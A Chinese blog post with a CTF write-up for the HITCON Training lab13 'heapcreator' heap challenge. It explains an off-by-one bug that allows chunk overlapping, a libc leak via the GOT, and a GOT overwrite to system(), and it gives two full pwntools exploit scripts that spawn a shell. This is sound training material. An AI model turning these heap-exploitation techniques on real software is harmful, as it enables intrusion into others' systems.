hitcontraning_lab13_writeup

最新推荐文章于 2022-08-22 12:51:01 发布
最新推荐文章于 2022-08-22 12:51:01 发布
阅读量240 收藏 1
点赞数 2
分类专栏: ctf-writeups 文章标签: 堆的利用
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43449190/article/details/89077760
版权

依然是wiki上的例题,先提供二进制源码:hitcontraning_lab13

预览:

预览

文件是64位,partial relro则可以改写got表,感觉就像是堆题(名字也叫heapcreator)。。。没有pie调试起来会方便很多。。。然后放进ida64看一下大致功能。

前言分析:

首先有两个setvbuf()设置好了标准输入和标准输出的缓冲区,所以程序不会在heap段设置chunk,然后打印一个菜单,之后就输入一个字符串,然后通过atoi()函数将字符串转换成数字,(这里可以想到如果将atoi_got改为system_addr后,直接输入‘/bin/sh\x00’就可以拿shell了),但是不幸的是他只可以输入4个字节。。。。但这一点后面能用上。

程序主要功能分析(寻找漏洞):

首先有四个主功能:create(),edit(),delete(),show(),当我们看到有edit和show存在的时候,这一题多半不会难,因为这两个函数为我们的泄露和篡改打下了基础,之后开始逐个分析。。

在create()中我们可以发现当输入size的时候调用atoi()的时候可以输入8个字符串!!!nice,我们的设想得到了成立!所以我们的目标设为改写atoi_got为system_addr。

在edit()功能中发现了off-by-one漏洞,通过这个我们可以实现chunk overlapping。

show()则是正常的打印内容。

delete()函数知识正常将chunk放入Bins,然后将指针归零,没有uaf漏洞。

利用漏洞来实现功能:

leak:

  1. 想要leak出libc,先考虑常用的泄露got表地址,因为show()功能是打印heap的content指针所指向的内容,所以想办法将content指针改为atoi_got,然后再show就可以泄露出Libc。

  2. 利用chunk overlapping来进行chunk的覆盖重叠,申请两个chunk,第一个chunk的作用是来改第二个heap结构体的大小(可以设计好使其正好和top_chunk接轨就省去了nextchunk的prev_inuse检查,例如我是申请一个content大小为0x10的chunk,然后将heap结构体的大小改为0x40),然后delete以后其会被放入对应的fastbin中,然后再申请与其大小对应(0x30)的heap,使heap结构体0x10申请到的内存位于之前content位于的地方。这就形成了覆盖。(经典的与unlink类似的,我改我自己形式,即通过漏洞利用使一个结构体中的一个指针指向自己地址前方的不远处,通过向那个地址编辑内容来达到修改自己的目的。)如下图所示:

    这就可以利用edit功能来改heap结构体的content指针。接着可以实现任意地址写的功能。

change:

  1. 泄露出libc以后就可以获得system_addr,然后利用任意地址写的功能将atoi_got改为system_addr,然后就利用之前说的方法来拿shell。

exp如下:

两种思路,只讲了第一种,第二种类似,只不过利用的是free(addr_’/bin/sh\x00’):

#coding:utf-8

from pwn import *

context(os='linux',arch='amd64')
#context.log_level = 'debug'

p = process('./heapcreator')
P = ELF('./heapcreator')
libc = ELF('./libc.so.6')
atoi_got=P.got['atoi']

#创建函数
def create(size,payload):
	p.recvuntil(':')
	p.sendline('1')
	p.recvuntil(': ')
	p.sendline(str(size))
	p.recvuntil(':')
	p.send(payload)

def edit(ID,payload):
	p.recvuntil(':')
	p.sendline('2')
	p.recvuntil(':')
	p.sendline(str(ID))
	p.recvuntil(': ')
	p.send(payload)

def show(ID):
	p.recvuntil(':')
	p.sendline('3')
	p.recvuntil(':')
	p.sendline(str(ID))

def delete(ID):
	p.recvuntil(':')
	p.sendline('4')
	p.recvuntil(':')
	p.sendline(str(ID))

payload='a'*0x18
create(0x18,payload)
payload='a'*0x10
create(0x10,payload)

payload='a'*0x18+p8(0x40)
edit(0,payload)

delete(1)

payload='a'*0x10 
create(0x30,payload)

#gdb.attach(p)
payload='a'*0x10+p64(0)+p64(0x21)+p64(0x30)+p64(atoi_got)
edit(1,payload)

#gdb.attach(p)
show(1)
p.recvuntil('Content : ')
atoi_addr = u64(p.recv(6).ljust(8,'\x00'))
log.success('atoi_addr=' + hex(atoi_addr))
#gdb.attach(p)
libcbase = atoi_addr - libc.symbols['atoi']
log.success('libcbase=' + hex(libcbase))
system_addr=libcbase + libc.symbols['system']

payload=p64(system_addr)
edit(1,payload)

p.recvuntil(':')
p.sendline('1')                                                                                               
p.recvuntil(': ')
p.sendline('/bin/sh\x00')

p.interactive()

#coding:utf-8

from pwn import *

context(os='linux',arch='amd64',timeout=1)

p = process('./heapcreator')
P = ELF('./heapcreator')
libc = ELF('./libc.so.6')
free_got=P.got['free']

#创建函数
def create(size,payload):
	p.recvuntil(':')
	p.sendline('1')
	p.recvuntil(': ')
	p.sendline(str(size))
	p.recvuntil(':')
	p.sendline(payload)

def edit(ID,payload):
	p.recvuntil(':')
	p.sendline('2')
	p.recvuntil(':')
	p.sendline(str(ID))
	p.recvuntil(': ')
	p.sendline(payload)

def show(ID):
	p.recvuntil(':')
	p.sendline('3')
	p.recvuntil(':')
	p.sendline(str(ID))

def delete(ID):
	p.recvuntil(':')
	p.sendline('4')
	p.recvuntil(':')
	p.sendline(str(ID))

#先创建两个堆块,让前面的off-by-one后面的
create(0x18,'a'*4)
create(0x10,'a'*4)
edit(0,'/bin/sh\x00'+'a'*0x10+'\x41')

#往fastbin送块
delete(1)

#再申请,使content覆盖heaparry[1]结构体的内容
create(0x30,p64(0)*4+p64(0x30)+p64(free_got))

#泄露libc
show(1)
p.recvuntil('Content : ')
free_addr=u64(p.recv()[0:6].ljust(8,'\x00'))
log.success('free_addr=' + hex(free_addr))
libcbase=free_addr-libc.symbols['free']
system_addr=libcbase+libc.symbols['system']

#将system_addr写入free_got里
edit(1,p64(system_addr))

delete(0)

p.interactive()

我第一次做的时候的一些心得:

hitconingtraining_lab13:

  • 这一题难度不大,但是还是没有独立做出来,需要再独立处理一遍。
  • 常见套路,申请书籍,然后用结构体储存书籍内容的指针和大小,结构体在堆上,书籍内容申请的空间也在堆上。
  • 有edit和print功能说明不难,用edit向书籍的内容指针里任意写,所以想办法将内容指针改为free_got,再调用edit功能将其内容改为system_addr。
  • 然后想改书籍的内容指针则需要控制结构体堆块,溢出和chunk overlapping都可以,溢出找不到,则为后者。
  • 利用off_by_one漏洞和fast_bin的机制,更改size of 第二本书结构体堆块,用第二本书的内容控制结构体堆块内容,更改其为free_got,然后edit书籍二。
  • 再考虑’/bin/sh’的位置,放在书籍一的内容里比较合适。system(addr_/bin/sh),因为内容为/bin/sh所以free(ptr_des)的时候正好为system(addr__ /bin/sh)。
xiao_xiao_ren_wu
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
溢出 HITCON Trainging lab13
winterze的博客
04-14 255
chunk-extend学习,一个友好的题目,下载地址 0x00 程序分析 基本信息 [*] '/home/ububtu/ctf/pwn/heapcreator' Arch: amd64-64-little RELRO: Partial RELRO Stack: Canary found NX: NX enabled PIE:...
2015_ransomware_writeup
06-23
周末勒索软件分析上周,我妻子的一位同事设法捕获了一个垃圾勒索软件; 我相信她是从一封与此类似的电子邮件中得到的: 我们公司的快递员无法派送包裹。 REASON: Postal code contains an error.DELIVERY STATUS: ...
HITCON-Training lab13 heapcreator(heap extend)
像初雪一样自由洒落
04-16 1009
啊啊啊,搞了一早上,终于终于搞明白了,,, 题目链接:https://buuoj.cn/challenges#hitcontraining_heapcreator ida简单看一下 创建 编辑 对比建,可以看到size大了一个 打印 删除 程序基本功能就这样了 因为edit的时候可以多写入一个字节,存在off-by-one,我们可...
HITCON Trainging lab13 heapcreator
snowleopard_bin的博客
10-03 987
记录第一次不看任何writeup自己写出来的pwn题 前置知识: off by one chunk overlapping chunk extend 一开始先看程序打开哪些保护机制 可以改got表,并且有点要注意是没开PIE,这样就不必泄露函数地址计算基址了(如果开了,这题上没有存放函数指针的,我也不会泄露。。) 然后分析程序,挖漏洞 首先从建函数看数据结构 结构...
buuctf hitcontraining_heapcreator HITCON Trainging lab13
weixin_45677731的博客
08-10 1010
这一题在wiki上面是有的,在Chunk Extend and Overlapping里面,个人觉得这一题对于我这种刚开始学习的人来说,是比较容易理解的一题 拖进IDA create_heap函数: 值得注意的是,他这里是会有两次malloc的,也就是说,你申请了一次,他就会创建两个chunk,第一个chunk是0x20大小的,可以看作是记录的作用,里面存放着第二个chunk的size和指针,同时,第一个chunk的地址指针保存在bss段中,heaparray数组这里: 这样表述起来可能不太清晰,我申
HITCON Trainging lab13——heapcreator
04-19 247
64位程序,没开PIE   #chunkoverlapping #off by one 程序逻辑 1 int __cdecl main(int argc, const char **argv, const char **envp) 2 { 3 char *v3; // rsi 4 const char *v4; // rdi 5 char...
ReverseRSA_writeup_rsa_appprivatekey_解密_
09-29
在“writeup_rsa_appprivatekey”中,作者可能详细记录了整个解密过程,包括所采用的策略、遇到的挑战以及最终的解决方案。这样的WriteUp对于学习者来说极其宝贵,因为它不仅展示了理论知识,还提供了实际问题解决的...
ADS Writeup_ads_
10-03
"Advanced Data Structure Writeup" 提供了一个深入探讨这一领域的详细分析,涵盖了各种复杂的数据结构及其在实际问题解决中的应用。 **一、数组** 数组是最基础的数据结构,它提供了固定大小且连续的内存空间来...
writeup_knkl_
09-30
【标题】"writeup_knkl_" 暗示了这是一个关于技术分析或漏洞报告的文档,其中"knkl"可能是某种缩写,可能代表一个特定的技术、工具或概念。由于描述部分"Raghav abnsaklfmleamafl;emgl;aeg"看起来像是随机字符序列,...
PracticalML_writeup
06-28
《实用ML_writeup》是关于机器学习(Machine Learning, ML)实践的一份详细总结,主要以R语言为工具进行讲解。R语言是一种广泛应用于统计分析、数据可视化和机器学习的编程语言,它拥有丰富的库和工具,使得数据分析...
HITCON Trainging lab13——CTFwiki
qq_53928256的博客
08-22 1083
通过off by one溢出修改next chunk的size域来实现overlap,修改指针实现执行system函数,获得系统权限
pwn HITCON Trainging lab13
doudoudedi
10-09 244
emem其实我的结构体学的不太好 结构体大概为这样: struct { char *heaparray[i]; char conten[20] } edit heaparray->content 编辑的地方存在一个off by one的漏洞我们可以修改下一个chunk的大小然后释放申请该大小的chunk造成溢出~~ 简单点说就是先创建三个块在第一个块写入’/bin/s...
hitcon lab1-lab14
Maxmalloc的博客
12-23 1064
lab 1 ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=0840aeca8337fc97ba1134067d05ee2563b3f4ce, not st...
HITCON training lab 11——bamboobox
04-23 553
64位程序  #House Of Force 程序逻辑 1 int __cdecl main(int argc, const char **argv, const char **envp) 2 { 3 _QWORD *v3; // [rsp+8h] [rbp-18h] 4 char buf; // [rsp+10h] [rbp-10h] 5 ...
HITCON-Training lab10(uaf入门题)
像初雪一样自由洒落
03-08 725
题目下载地址:https://github.com/scwuaptx/HITCON-Training 哈哈哈,纪念一下明白的第一道题,虽然它真的很简单。。。 32位程序 三个功能,增、删、打印 程序给我们预留了后门函数 add函数,创建note会有两个块,分别是存放两个函数指针的8字节块和存放内容的块 这个示意图很清楚: ...
HITCON lab4 wp
qq_43409582的博客
09-30 327
0x01 之前在ctf-wiki上做过的re2lib,这道题也差不多。仿照ctf-wiki上的做法,想到需要用到libc.so 的延迟绑定技术,用 got 表泄露,即输出某个函数对应的 got 表项的内容,好了话不多说先看题,首先看保护: 只开了NX. 用IDA查看: main(): 发现有个puts()函数,很容易想到用这个函数打印出它的真实地址,然后计算偏移量得到system函数的真实地址,...
HITCON-Training lab7(一道简单的格式化字符串读漏洞)
像初雪一样自由洒落
03-27 257
格式化字符串知道他的操作,可是做的一点也不熟练吧,,,BJDCTF上的r2t4不会啊,,,看不懂,,,所以就来补补格式化字符串的题目了,,,, 看到canary开启了,我还以为要泄漏canary呢,结果发现不用那么麻烦,,, 其实看下,思路很清晰,先让你输入东西,然后返回给你,然后你输入password,如果和程序中的一样,你就拿到flag了,, 所以输入的东西里面需要泄漏pa...
2024年欧洲铝桁架市场主要企业市场占有率及排名.docx
07-17
2024年欧洲铝桁架市场主要企业市场占有率及排名.docx
torchaudio-0.13.1+cpu-cp39-cp39-win_amd64.whl
最新发布
07-17
torchaudio软件包,直接下载下来,通过命令窗口输入:pip install torchaudio-xxx.whl安装就行,再也不怕pip安装timeout了
php upload ctf,强网杯CTF防御赛ez_upload Writeup
05-14
首先,我们需要分析题目所提供的代码: ... error_reporting(0); if ($_FILES["upload"]["error"] > 0) { echo "Error: " . $_FILES["upload"]["error"] .... echo "Upload: " .... echo "Type: " .... echo "Size: " ....

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值